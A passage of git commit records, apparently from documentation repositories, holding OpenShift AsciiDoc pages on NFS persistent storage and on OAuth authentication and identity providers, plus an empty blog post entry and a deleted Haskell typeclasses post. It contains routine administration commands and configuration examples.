This SCC has the\n`*supplementalGroups*` strategy set to *RunAsAny*, meaning that any supplied\ngroup ID will be accepted without range checking.\n\nAs a result, the above pod will pass admissions and will be launched. However,\nif group ID range checking is desired, a custom SCC, as described in\nlink:pod_security_context.html#scc-supplemental-groups[pod security and custom SCCs],\nis the preferred solution. A custom SCC can be created such that minimum and\nmaximum group IDs are defined, group ID range checking is enforced, and a group\nID of 5555 is allowed.\n\n[[nfs-user-ids]]\n=== User IDs\n\nUser IDs can be defined in the container image or in the pod definition. The\nfull link:pod_security_context.html#user-id[Volume Security] topic covers\ncontrolling storage access based on user IDs, and should be read prior to\nsetting up NFS persistent storage.\n\n[NOTE]\n====\nIt is generally preferable to use link:#nfs-supplemental-groups[supplemental\ngroup IDs] to gain access to persistent storage versus using user IDs.\n====\n\nIn the link:#nfs-export[example target NFS directory] shown above, the container\nneeds its UID set to 65534 (ignoring group IDs for the moment), so the following\ncan be added to the pod definition:\n\n====\n[source,yaml]\n----\nspec:\n containers: <1>\n - name:\n ...\n securityContext:\n runAsUser: 65534 <2>\n----\n<1> Pods contain a `*securityContext*` specific to each container (shown here) and\na pod-level `*securityContext*` which applies to all containers defined in the pod.\n<2> 65534 is the *nfsnobody* user.\n====\n\nAssuming the *default* project and the *restricted* SCC, the pod's requested\nuser ID of 65534 will, unfortunately, not be allowed, and therefore the pod will\nfail. The pod fails because of the following:\n\n- It requests 65534 as its user ID.\n- All SCCs available to the pod are examined to see which SCC will allow a user ID\nof 65534 (actually, all policies of the SCCs are checked but the focus here is\non user ID).\n- Because all available SCCs use *MustRunAsRange* for their `*runAsUser*`\nstrategy, UID range checking is required.\n- 65534 is not included in the SCC or project's user ID range.\n\nIt is generally considered a good practice not to modify the predefined SCCs.\nThe preferred way to fix this situation is to create a custom SCC, as described\nin the full link:pod_security_context.html#scc-runasuser[Volume Security] topic.\nA custom SCC can be created such that minimum and maximum user IDs are defined,\nUID range checking is still enforced, and the UID of 65534 will be allowed.\n\n[[nfs-selinux]]\n=== SELinux\n\n[NOTE]\n====\nSee the full link:pod_security_context.html#volsec-selinux[Volume Security]\ntopic for information on controlling storage access in conjunction with using\nSELinux.\n====\n\nBy default, SELinux does not allow writing from a pod to a remote NFS server.\nThe NFS volume mounts correctly, but is read-only.\n\nTo enable writing to NFS volumes with SELinux enforcing on each node, run:\n\n----\n# setsebool -P virt_use_nfs 1\n# setsebool -P virt_sandbox_use_nfs 1\n----\n\nThe `-P` option above makes the bool persistent between reboots.\n\nThe *virt_use_nfs* boolean is defined by the *_docker-selinux_* package. 
If an\nerror is seen indicating that this bool is not defined, ensure this package has\nbeen installed.\n\n[[nfs-export-settings]]\n=== Export Settings\n\nIn order to enable arbitrary container users to read and write the volume, each\nexported volume on the NFS server should conform to the following conditions:\n\n- Each export must be:\n+\n----\n\/<example_fs> *(rw,root_squash)\n----\n- The firewall must be configured to allow traffic to the mount point. For NFSv4,\nthe default port is 2049 (*nfs*). For NFSv3, there are three ports to configure:\n2049 (*nfs*), 20048 (*mountd*), and 111 (*portmapper*).\n+\n.NFSv4\n----\n# iptables -I INPUT 1 -p tcp --dport 2049 -j ACCEPT\n----\n+\n.NFSv3\n----\n# iptables -I INPUT 1 -p tcp --dport 2049 -j ACCEPT\n# iptables -I INPUT 1 -p tcp --dport 20048 -j ACCEPT\n# iptables -I INPUT 1 -p tcp --dport 111 -j ACCEPT\n----\n- The NFS export and directory must be set up so that it is accessible by the\ntarget pods. Either set the export to be owned by the container's primary UID,\nor supply the pod group access using `*supplementalGroups*`, as shown in\nlink:#nfs-supplemental-groups[Group IDs] above. See the full\nlink:pod_security_context.html[Volume Security] topic for additional pod\nsecurity information as well.\n\n[[nfs-reclaiming-resources]]\n== Reclaiming Resources\nNFS implements the OpenShift *Recyclable* plug-in interface. Automatic\nprocesses handle reclamation tasks based on policies set on each persistent\nvolume.\n\nBy default, persistent volumes are set to *Retain*. NFS volumes which are set to\n*Recycle* are scrubbed (i.e., `rm -rf` is run on the volume) after being\nreleased from their claim (i.e., after the user's `*PersistentVolumeClaim*` bound\nto the volume is deleted). Once recycled, the NFS volume can be bound to a new\nclaim.\n\n[[nfs-automation]]\n== Automation\nClusters can be provisioned with persistent storage using NFS in the following\nways:\n\n- link:#nfs-enforcing-disk-quotas[Enforce storage quotas] using disk partitions.\n- Enforce security by link:#nfs-volume-security[restricting volumes] to the\nproject that has a claim to them.\n- Configure link:#nfs-reclaiming-resources[reclamation of discarded resources] for\neach PV.\n\nThere are many ways that you can use scripts to automate the above tasks. You can\nuse an\nlink:https:\/\/github.com\/openshift\/openshift-ansible\/tree\/master\/roles\/kube_nfs_volumes[example\nAnsible playbook] to help you get started.\n\n[[nfs-additional-config-and-troubleshooting]]\n== Additional Configuration and Troubleshooting\n\nDepending on what version of NFS is being used and how it is configured, there\nmay be additional configuration steps needed for proper export and security\nmapping. The following are some that may apply:\n\n[cols=\"1,2\"]\n|====\n\n|NFSv4 mount incorrectly shows all files with ownership of *nobody:nobody*\na|- Could be attributed to the ID mapping settings (\/etc\/idmapd.conf) on your NFS\n- See https:\/\/access.redhat.com\/solutions\/33455[this Red Hat Solution].\n\n|Disabling ID mapping on NFSv4\na|- On both the NFS client and server, run:\n+\n----\n# echo 'Y' > \/sys\/module\/nfsd\/parameters\/nfs4_disable_idmapping\n----\n|====\n","old_contents":"= Persistent Storage Using NFS\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title:\n:prewrap!:\n\ntoc::[]\n\n== Overview\n\nOpenShift clusters can be provisioned with\nlink:..\/..\/architecture\/additional_concepts\/storage.html[persistent storage]\nusing NFS. 
Persistent volumes (PVs) and persistent volume claims (PVCs) provide\na convenient method for sharing a volume across a project. While the\nNFS-specific information contained in a PV definition could also be defined\ndirectly in a pod definition, doing so does not create the volume as a distinct\ncluster resource, making the volume more susceptible to conflicts.\n\nThis topic covers the specifics of using the NFS persistent storage type. Some\nfamiliarity with OpenShift and\nhttps:\/\/access.redhat.com\/documentation\/en-US\/Red_Hat_Enterprise_Linux\/7\/html\/Storage_Administration_Guide\/ch-nfs.html[NFS]\nis beneficial. See the\nlink:..\/..\/architecture\/additional_concepts\/storage.html[Persistent Storage]\nconcept topic for details on the OpenShift persistent volume (PV) framework in\ngeneral.\n\n[[nfs-provisioning]]\n== Provisioning\n\nStorage must exist in the underlying infrastructure before it can be mounted as\na volume in OpenShift. To provision NFS volumes, a list of NFS servers and\nexport paths are all that is required.\n\nYou must first create an object definition for the PV:\n\n.PV Object Definition Using NFS\n====\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolume\nmetadata:\n name: pv0001 <1>\nspec:\n capacity:\n storage: 5Gi <2>\n accessModes:\n - ReadWriteOnce <3>\n nfs: <4>\n path: \/tmp <5>\n server: 172.17.0.2 <6>\n persistentVolumeReclaimPolicy: Recycle <7>\n----\n<1> The name of the volume. This is the PV identity in various `oc <command>\npod` commands.\n<2> The amount of storage allocated to this volume.\n<3> Though this appears to be related to controlling access to the volume, it is\nactually used similarly to labels and used to match a PVC to a PV. Currently, no\naccess rules are enforced based on the `*accessModes*`.\n<4> The volume type being used, in this case the *nfs* plug-in.\n<5> The path that is exported by the NFS server.\n<6> The host name or IP address of the NFS server.\n<7> The reclaim policy for the PV. This defines what happens to a volume when released\nfrom its claim. Valid options are *Retain* (default) and *Recycle*. See\nlink:#nfs-reclaiming-resources[Reclaiming Resources].\n====\n\n[NOTE]\n====\nEach NFS volume must be mountable by all schedulable nodes in the cluster.\n====\n\nSave the definition to a file, for example *_nfs-pv.yaml_*, and create the PV:\n\n====\n----\n$ oc create -f nfs-pv.yaml\npersistentvolume \"pv0001\" created\n----\n====\n\nVerify that the PV was created:\n\n====\n----\n# oc get pv\nNAME LABELS CAPACITY ACCESSMODES STATUS CLAIM REASON AGE\npv0001 <none> 5368709120 RWO Available 31s\n----\n====\n\nThe next step can be to create a persistent volume claim (PVC) which will bind\nto the new PV:\n\n.PVC Object Definition\n====\n[source,yaml]\n----\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: nfs-claim1\nspec:\n accessModes:\n - ReadWriteOnce <1>\n resources:\n requests:\n storage: 1Gi <2>\n----\n<1> As mentioned above for PVs, the `*accessModes*` do not enforce security, but\nrather act as labels to match a PV to a PVC.\n<2> This claim will look for PVs offering *1Gi* or greater capacity.\n====\n\nSave the definition to a file, for example *_nfs-claim.yaml_*, and create the\nPVC:\n\n====\n----\n# oc create -f nfs-claim.yaml\n----\n====\n\n[[nfs-enforcing-disk-quotas]]\n== Enforcing Disk Quotas\n\nYou can uses disk partitions to enforce disk quotas and size constraints. Each\npartition can be its own export. Each export is one PV. 
OpenShift enforces\nunique names for PVs, but the uniqueness of the NFS volume's server and path is\nup to the administrator.\n\nEnforcing quotas in this way allows the developer to request persistent storage\nby a specific amount (for example, 10Gi) and be matched with a corresponding\nvolume of equal or greater capacity.\n\n[[nfs-volume-security]]\n== Volume Security\n\nThis section covers NFS volume security, including matching permissions and\nSELinux considerations. The reader is expected to understand the basics of POSIX\npermissions, process UIDs, supplemental groups, and SELinux.\n\n[NOTE]\n====\nSee the full\nlink:..\/..\/install_config\/persistent_storage\/pod_security_context.html[Volume\nSecurity] topic before implementing NFS volumes.\n====\n\nDevelopers request NFS storage by referencing, in the `*volumes*` section of\ntheir pod definition, either a PVC by name or the NFS volume plug-in directly.\n\nThe *_\/etc\/exports_* file on the NFS server contains the accessible NFS\ndirectories. The target NFS directory has POSIX owner and group IDs. The\nOpenShift NFS plug-in mounts the container's NFS directory with the same POSIX\nownership and permissions found on the exported NFS directory. However, the\ncontainer is not run with its effective UID equal to the owner of the NFS mount,\nwhich is the desired behavior.\n\nAs an example, if the target NFS directory appears on the NFS server as:\n\n[[nfs-export]]\n====\n----\n# ls -lZ \/opt\/nfs -d\ndrwxrws---. nfsnobody 5555 unconfined_u:object_r:usr_t:s0 \/opt\/nfs\n\n# id nfsnobody\nuid=65534(nfsnobody) gid=65534(nfsnobody) groups=65534(nfsnobody)\n----\n====\n\nThen the container must match SELinux labels, and either run with a UID of\n*65534* (*nfsnobody* owner) or with *5555* in its supplemental groups in order\nto access the directory.\n\n[NOTE]\n====\nThe owner ID of 65534 is used as an example. Even though NFS's *root_squash*\nmaps *root* (0) to *nfsnobody* (65534), NFS exports can have arbitrary owner\nIDs. Owner 65534 is not required for NFS exports.\n====\n\n[[nfs-supplemental-groups]]\n=== Group IDs\n\nThe recommended way to handle NFS access (assuming it is not an option to change\npermissions on the NFS export) is to use supplemental groups. Supplemental\ngroups in OpenShift are used for shared storage, of which NFS is an example. In\ncontrast, block storage, such as Ceph RBD or iSCSI, use the *fsGroup* SCC\nstrategy and the *fsGroup* value in the pod's `*securityContext*`.\n\n[NOTE]\n====\nIt is generally preferable to use supplemental group IDs to gain access to\npersistent storage versus using link:#nfs-user-ids[user IDs]. Supplemental\ngroups are covered further in the full\nlink:pod_security_context.html#supplemental-groups[Volume Security] topic.\n====\n\nBecause the group ID on the link:#nfs-export[example target NFS directory] shown\nabove is 5555, the pod can define that group ID using `*supplementalGroups*`\nunder the pod-level `*securityContext*` definition. For example:\n\n====\n----\nspec:\n containers:\n - name:\n ...\n securityContext: <1>\n supplementalGroups: [5555] <2>\n----\n<1> `*securityContext*` must be defined at the pod level, not under a specific container.\n<2> An array of GIDs defined for the pod. In this case, there is one element in the array;\nadditional GIDs would be comma-separated.\n====\n\nAssuming there are no custom SCCs that might satisfy the pod's requirements, the\npod will likely match the *restricted* SCC. 
This SCC has the\n`*supplementalGroups*` strategy set to *RunAsAny*, meaning that any supplied\ngroup ID will be accepted without range checking.\n\nAs a result, the above pod will pass admissions and will be launched. However,\nif group ID range checking is desired, a custom SCC, as described in\nlink:pod_security_context#scc-supplemental-groups[pod security and custom SCCs],\nis the preferred solution. A custom SCC can be created such that minimum and\nmaximum group IDs are defined, group ID range checking is enforced, and a group\nID of 5555 is allowed.\n\n[[nfs-user-ids]]\n=== User IDs\n\nUser IDs can be defined in the container image or in the pod definition. The\nfull link:pod_security_context.html#user-id[Volume Security] topic covers\ncontrolling storage access based on user IDs, and should be read prior to\nsetting up NFS persistent storage.\n\n[NOTE]\n====\nIt is generally preferable to use link:#nfs-supplemental-groups[supplemental\ngroup IDs] to gain access to persistent storage versus using user IDs.\n====\n\nIn the link:#nfs-export[example target NFS directory] shown above, the container\nneeds its UID set to 65534 (ignoring group IDs for the moment), so the following\ncan be added to the pod definition:\n\n====\n[source,yaml]\n----\nspec:\n containers: <1>\n - name:\n ...\n securityContext:\n runAsUser: 65534 <2>\n----\n<1> Pods contain a `*securtityContext*` specific to each container (shown here) and\na pod-level `*securityContext*` which applies to all containers defined in the pod.\n<2> 65534 is the *nfsnobody* user.\n====\n\nAssuming the *default* project and the *restricted* SCC, the pod's requested\nuser ID of 65534 will, unfortunately, not be allowed, and therefore the pod will\nfail. The pod fails because of the following:\n\n- It requests 65534 as its user ID.\n- All SCCs available to the pod are examined to see which SCC will allow a user ID\nof 65534 (actually, all policies of the SCCs are checked but the focus here is\non user ID).\n- Because all available SCCs use *MustRunAsRange* for their `*runAsUser*`\nstrategy, UID range checking is required.\n- 65534 is not included in the SCC or project's user ID range.\n\nIt is generally considered a good practice not to modify the predefined SCCs.\nThe preferred way to fix this situation is to create a custom SCC, as described\nin the full link:pod_security_context.html#scc-runasuser[Volume Security] topic.\nA custom SCC can be created such that minimum and maximum user IDs are defined,\nUID range checking is still enforced, and the UID of 65534 will be allowed.\n\n[[nfs-selinux]]\n=== SELinux\n\n[NOTE]\n====\nSee the full link:pod_security_context.html#volsec-selinux[Volume Security]\ntopic for information on controlling storage access in conjunction with using\nSELinux.\n====\n\nBy default, SELinux does not allow writing from a pod to a remote NFS server.\nThe NFS volume mounts correctly, but is read-only.\n\nTo enable writing to NFS volumes with SELinux enforcing on each node, run:\n\n----\n# setsebool -P virt_use_nfs 1\n# setsebool -P virt_sandbox_use_nfs 1\n----\n\nThe `-P` option above makes the bool persistent between reboots.\n\nThe *virt_use_nfs* boolean is defined by the *_docker-selinux_* package. 
If an\nerror is seen indicating that this bool is not defined, ensure this package has\nbeen installed.\n\n[[nfs-export-settings]]\n=== Export Settings\n\nIn order to enable arbitrary container users to read and write the volume, each\nexported volume on the NFS server should conform to the following conditions:\n\n- Each export must be:\n+\n----\n\/<example_fs> *(rw,root_squash)\n----\n- The firewall must be configured to allow traffic to the mount point. For NFSv4,\nthe default port is 2049 (*nfs*). For NFSv3, there are three ports to configure:\n2049 (*nfs*), 20048 (*mountd*), and 111 (*portmapper*).\n+\n.NFSv4\n----\n# iptables -I INPUT 1 -p tcp --dport 2049 -j ACCEPT\n----\n+\n.NFSv3\n----\n# iptables -I INPUT 1 -p tcp --dport 2049 -j ACCEPT\n# iptables -I INPUT 1 -p tcp --dport 20048 -j ACCEPT\n# iptables -I INPUT 1 -p tcp --dport 111 -j ACCEPT\n----\n- The NFS export and directory must be set up so that it is accessible by the\ntarget pods. Either set the export to be owned by the container's primary UID,\nor supply the pod group access using `*suppplementalGroups*`, as shown in\nlink:#nfs-supplemental-groups[Group IDs] above. See the full\nlink:pod_security_context.html[Volume Security] topic for additional pod\nsecurity information as well.\n\n[[nfs-reclaiming-resources]]\n== Reclaiming Resources\nNFS implements the OpenShift *Recyclable* plug-in interface. Automatic\nprocesses handle reclamation tasks based on policies set on each persistent\nvolume.\n\nBy default, persistent volumes are set to *Retain*. NFS volumes which are set to\n*Recycle* are scrubbed (i.e., `rm -rf` is run on the volume) after being\nreleased from their claim (i.e, after the user's `*PersistentVolumeClaim*` bound\nto the volume is deleted). Once recycled, the NFS volume can be bound to a new\nclaim.\n\n[[nfs-automation]]\n== Automation\nClusters can be provisioned with persistent storage using NFS in the following\nways:\n\n- link:#nfs-enforcing-disk-quotas[Enforce storage quotas] using disk partitions.\n- Enforce security by link:#nfs-volume-security[restricting volumes] to the\nproject that has a claim to them.\n- Configure link:#nfs-reclaiming-resources[reclamation of discarded resources] for\neach PV.\n\nThey are many ways that you can use scripts to automate the above tasks. You can\nuse an\nlink:https:\/\/github.com\/openshift\/openshift-ansible\/tree\/master\/roles\/kube_nfs_volumes[example\nAnsible playbook] to help you get started.\n\n[[nfs-additional-config-and-troubleshooting]]\n== Additional Configuration and Troubleshooting\n\nDepending on what version of NFS is being used and how it is configured, there\nmay be additional configuration steps needed for proper export and security\nmapping. 
The following are some that may apply:\n\n[cols=\"1,2\"]\n|====\n\n|NFSv4 mount incorrectly shows all files with ownership of *nobody:nobody*\na|- Could be attributed to the ID mapping settings (\/etc\/idmapd.conf) on your NFS\n- See https:\/\/access.redhat.com\/solutions\/33455[this Red Hat Solution].\n\n|Disabling ID mapping on NFSv4\na|- On both the NFS client and server, run:\n+\n----\n# echo 'Y' > \/sys\/module\/nfsd\/parameters\/nfs4_disable_idmapping\n----\n|====\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f383bc509adafa5683b4293c86605ff431252ee9","subject":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","message":"Update 2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_file":"_posts\/2016-04-06-Inyeccion-H-T-M-L-y-X-S-S-persistente.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"933d2bebd25a476d7e9c890435db648f7263a443","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"mit","lang":"AsciiDoc"} {"commit":"b3b7c567140cf93aa5bdfd0280e299dcc3bd3111","subject":"Delete the file at '_posts\/2017-05-21-Typeclasses-in-haskell.adoc'","message":"Delete the file at '_posts\/2017-05-21-Typeclasses-in-haskell.adoc'","repos":"seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io,seturne\/hubpress.io","old_file":"_posts\/2017-05-21-Typeclasses-in-haskell.adoc","new_file":"_posts\/2017-05-21-Typeclasses-in-haskell.adoc","new_contents":"","old_contents":"\/\/ = Your Blog title\n\/\/ See https:\/\/hubpress.gitbooks.io\/hubpress-knowledgebase\/content\/ for information about the parameters.\n\/\/ :hp-image: \/covers\/cover.png\n\/\/ :published_at: 2019-01-31\n\/\/ :hp-tags: HubPress, Blog, Open_Source,\n\/\/ :hp-alt-title: My English Title\n\n\n= Typeclasses in haskell\n\n. You can think of them kind of as Java interface and unlike classes in OOP\n. What's the type signature of the `==` function?\n+\n[source,shell session]\n----\nghci> :t (==)\n(==) :: (Eq a) => a -> a -> Bool\n\/\/`=>` class constraint\n----\n. Eq, Ord, Show, Read, Enum, Bounded, Num, Integral, Floating\n. CHCI could infer what kind of result we wanted out of read.\n+\n[source,shell session]\n----\nghci> read \"4\" \n<interactive>:1:0: \n Ambiguous type variable `a' in the constraint: \n `Read a' arising from a use of `read' at <interactive>:1:0-7 \n Probable fix: add a type signature that fixes these type variable(s)\n \nghci> read \"5\" :: Int\n5\nit :: Int\n\nghci> [1 .. 5]\n[1,2,3,4,5]\nit :: (Enum t, Num t) => [t]\nghci> succ 'b'\n'c'\nit :: Char\nghci> pred 'b'\n'a'\nit :: Char\n\nghci> maxBound :: Char\n'\\1114111'\nit :: Char\n----\n. In this case, we can use explicit *Type annotations* by adding `::` refer to above\n. 
\uac1d\uccb4\uc9c0\ud5a5\uc5b8\uc5b4\uc5d0 \ud074\ub798\uc2a4\ub4e4\uacfc \ud0c0\uc785\ud074\ub798\uc2a4\ub294 \ub2e4\ub974\ub2e4, \uc624\ud788\ub824 \uc790\ubc14\uc5d0 \uc778\ud130\ud398\uc774\uc2a4 \uc815\ub3c4\ub85c \uc0dd\uac01\ub428\n. \ud0c0\uc785\ucd94\ub860\uc774 \ud56d\uc0c1 \uc798 \ub420\uaebc\ub77c\ub294 \uac00\uc815\uc740 \uc811\uc5b4\ub450\uc2dc\uae38\n\n## Reference\nhttp:\/\/learnyouahaskell.com\/types-and-typeclasses","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5b36e17e713f3af72946ff5ffaf9d7fe8d11e525","subject":"Update default access token lifetime to 1 day","message":"Update default access token lifetime to 1 day\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"architecture\/authentication.adoc","new_file":"architecture\/authentication.adoc","new_contents":"= Authentication\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title: \n\ntoc::[]\n\n== Overview\n\nThe authentication layer is responsible for identifying the user associated with requests to the OpenShift API. Information about the requesting user is then used by the authorization layer to determine whether the request should be allowed.\n\n== API Authentication\n\nRequests to the OpenShift API are authenticated using the following methods:\n\n* OAuth Access Tokens\n** Obtained from the OpenShift OAuth server using the `<master>\/oauth\/authorize` and `<master>\/oauth\/token` endpoints\n** Sent as an \"Authorization: Bearer …\" header or an \"access_token=…\" query parameter\n* X.509 Client Certificates\n** Requires a https connection to the API server\n** Verified by the API server against a trusted certificate authority bundle\n** The API server creates and distributes certificates to controllers to authenticate themselves\n\nAny request with an invalid access token or an invalid certificate is rejected by the authentication layer with a 401 error.\n\nIf no access token or certificate is presented, the authentication layer assigns the `system:anonymous` user and the `system:unauthenticated` group to the request. This allows the authorization layer to determine which requests (if any) an anonymous user is allowed to make.\n\n== OAuth overview\n\nThe OpenShift master includes a built-in OAuth server. End-users obtain OAuth access tokens to authenticate themselves to the API.\n\nWhen a person requests a new OAuth token, the OAuth server uses the configured identity provider(s) to determine the identity of the person making the request.\n\nIt then determines what user that identity maps to, creates an access token for that user, and returns the token for use.\n\n=== OAuth clients\n\nEvery request for an OAuth token must specify the OAuth client which will receive and use the token. 
The following OAuth clients are automatically created when starting the OpenShift API:\n\n * `openshift-web-console`: used to request tokens for the web console\n * `openshift-browser-client`: used to request tokens at `<master>\/oauth\/token\/request` with a user-agent that can handle interactive logins\n * `openshift-challenging-client`: used to request tokens with a user-agent that can handle `WWW-Authenticate` challenges\n\nTo register additional clients:\n====\n----\nosc create -f <(echo '\n{\n \"kind\": \"OAuthClient\",\n \"version\": \"v1beta1\",\n \"metadata\": {\n \"name\":\"demo\" <1>\n },\n \"secret\": \"...\", <2>\n \"redirectURIs\": [\n \"http:\/\/www.example.com\/\" <3>\n ]\n}')\n----\n<1> The `name` of the OAuth client is used as the `client_id` parameter when making requests to `<master>\/oauth\/authorize` and `<master>\/oauth\/token`.\n<2> The `secret` is used as the `client_secret` parameter when making requests to `<master>\/oauth\/token`.\n<3> The `redirect_uri` parameter specified in requests to `<master>\/oauth\/authorize` and `<master>\/oauth\/token` must be equal to (or prefixed by) one of the URIs in `redirectURIs`.\n====\n\n=== Integrations\n\nAll requests for OAuth tokens involve a request to `<master>\/oauth\/authorize`. Most authentication integrations will place an authenticating proxy in front of this endpoint, or configure OpenShift to validate credentials against a backing identity provider.\n\nBecause requests to `<master>\/oauth\/authorize` can come from user-agents that cannot display interactive login pages (like `osc`), authenticating using a `WWW-Authenticate` challenge is supported in addition to interactive login flows.\n\nIf an authenticating proxy is placed in front of the `<master>\/oauth\/authorize` endpoint, it should send unauthenticated non-browser user-agents `WWW-Authenticate` challenges, rather than displaying an interactive login page or redirecting to an interactive login flow.\n\nIf the authenticating proxy cannot support `WWW-Authenticate` challenges (or if OpenShift is configured to use an identity provider that does not support WWW-Authenticate challenges), users can visit `<master>\/oauth\/token\/request` using a browser to obtain an access token manually.\n\n== OAuth configuration\n\nOAuth configuration is specified in the master config file.\n\nWhen running without a master config file, the `AllowAllPasswordIdentityProvider` identity provider is used, which allows any non-empty username and password to log in. This is useful for test purposes.\n\nTo use other identity providers, you must run from a config file. For more information about creating and running from config files, see link:..\/using_openshift\/master_node_configuration.html[Master and Node Configuration].\n\n=== Identity providers\n\n==== Allow All [[AllowAllPasswordIdentityProvider]]\n\n`AllowAllPasswordIdentityProvider` allows any non-empty login and password. 
This is the default identity provider when running OpenShift without a config file.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_allow_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: AllowAllPasswordIdentityProvider\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n====\n\n==== Deny All [[DenyAllPasswordIdentityProvider]]\n\n`DenyAllPasswordIdentityProvider` denies all username and passwords.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_deny_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: DenyAllPasswordIdentityProvider\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n====\n\n==== HTPasswd [[HTPasswdPasswordIdentityProvider]]\n\n`HTPasswdPasswordIdentityProvider` validates logins and passwords against a flat-file generated using http:\/\/httpd.apache.org\/docs\/2.4\/programs\/htpasswd.html[htpasswd]\n\n* Only MD5 and SHA encryption types are supported. MD5 encryption is recommended, and is the default for htpasswd. Plaintext, crypt, and bcrypt hashes are not currently supported.\n* The file is re-read if its modification time changes, without requiring a server restart\n* To create the file: `htpasswd -c <\/path\/to\/users.htpasswd> <login>`\n* To add or update a login to the file: `htpasswd <\/path\/to\/users.htpasswd> <login>`\n* To remove a login from the file: `htpasswd <\/path\/to\/users.htpasswd> -D <login>`\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_htpasswd_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: HTPasswdPasswordIdentityProvider\n file: \/path\/to\/users.htpasswd <4>\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n<4> File generated using http:\/\/httpd.apache.org\/docs\/2.4\/programs\/htpasswd.html[htpasswd].\n====\n\n==== Basic-Auth (remote) [[BasicAuthPasswordIdentityProvider]]\n\n`BasicAuthPasswordIdentityProvider` validates logins and passwords against a remote server using a server-to-server basic-auth request.\n\n* Logins and passwords are validated against a basic-auth protected, JSON-returning remote URL\n* A 401 response indicates failed auth.\n* A non-200 status, or the presence of a non-empty \"error\" key, indicates an error: `{\"error\":\"Error message\"}`\n* A 200 status with an \"id\" key indicates success: `{\"id\":\"userid\"}`\n** The id must be unique to the authenticated user\n** The id must not be able to be modified\n* A successful response 
may optionally provide additional data:\n** Display name. Example: `{\"id\":\"userid\", \"name\": \"User Name\", ...}`\n** Email address. Example: `{\"id\":\"userid\", \"email\":\"user@example.com\", ...}`\n** Preferred login. This is useful when the unique, unchangeable user id is a database key or UID, and a more human-readable name exists. This is used as a hint when provisioning the OpenShift user for the authenticated identity. Example: `{\"id\":\"014fbff9a07c\", \"login\":\"bob\", ...}`\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_remote_basic_auth_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: BasicAuthPasswordIdentityProvider\n url: https:\/\/www.example.com\/remote-idp <4>\n ca: \/path\/to\/ca.file <5>\n certFile: \/path\/to\/client.crt <6>\n keyFile: \/path\/to\/client.key <7>\n----\n<1> This provider name is prefixed to the returned user id to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n<4> URL accepting credentials in basic-auth headers.\n<5> Certificate bundle to use to validate server certificates for the configured URL. Optional.\n<6> Client certificate to present when making requests to the configured URL. Optional.\n<7> Key for the client certificate. Required if `certFile` is specified.\n====\n\n==== Request Header [[RequestHeaderIdentityProvider]]\n\n`RequestHeaderIdentityProvider` identifies users from request header values, like `X-Remote-User`. It is typically used in combination with an authenticating proxy, which sets the request header value.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_request_header_provider <1>\n challenge: false <2>\n login: false <3>\n provider:\n apiVersion: v1\n kind: RequestHeaderIdentityProvider\n clientCA: \/path\/to\/client-ca.file <4>\n headers: <5>\n - X-Remote-User\n - SSO-User\n----\n<1> This provider name is prefixed to the user id in the request header to form an identity name.\n<2> `RequestHeaderIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> `RequestHeaderIdentityProvider` cannot be used to back a login page.\n<4> PEM-encoded certificate bundle. If set, a valid client certificate must be presented and validated against the certificate authorities in the specified file before the request headers are checked for usernames. Optional.\n<5> Header names to check, in order, for user ids. The first header containing a value is used as the user id. Required, case-insensitive.\n====\n\n==== GitHub [[GitHub]]\n\n`GitHubIdentityProvider` uses GitHub as an identity provider, using the OAuth 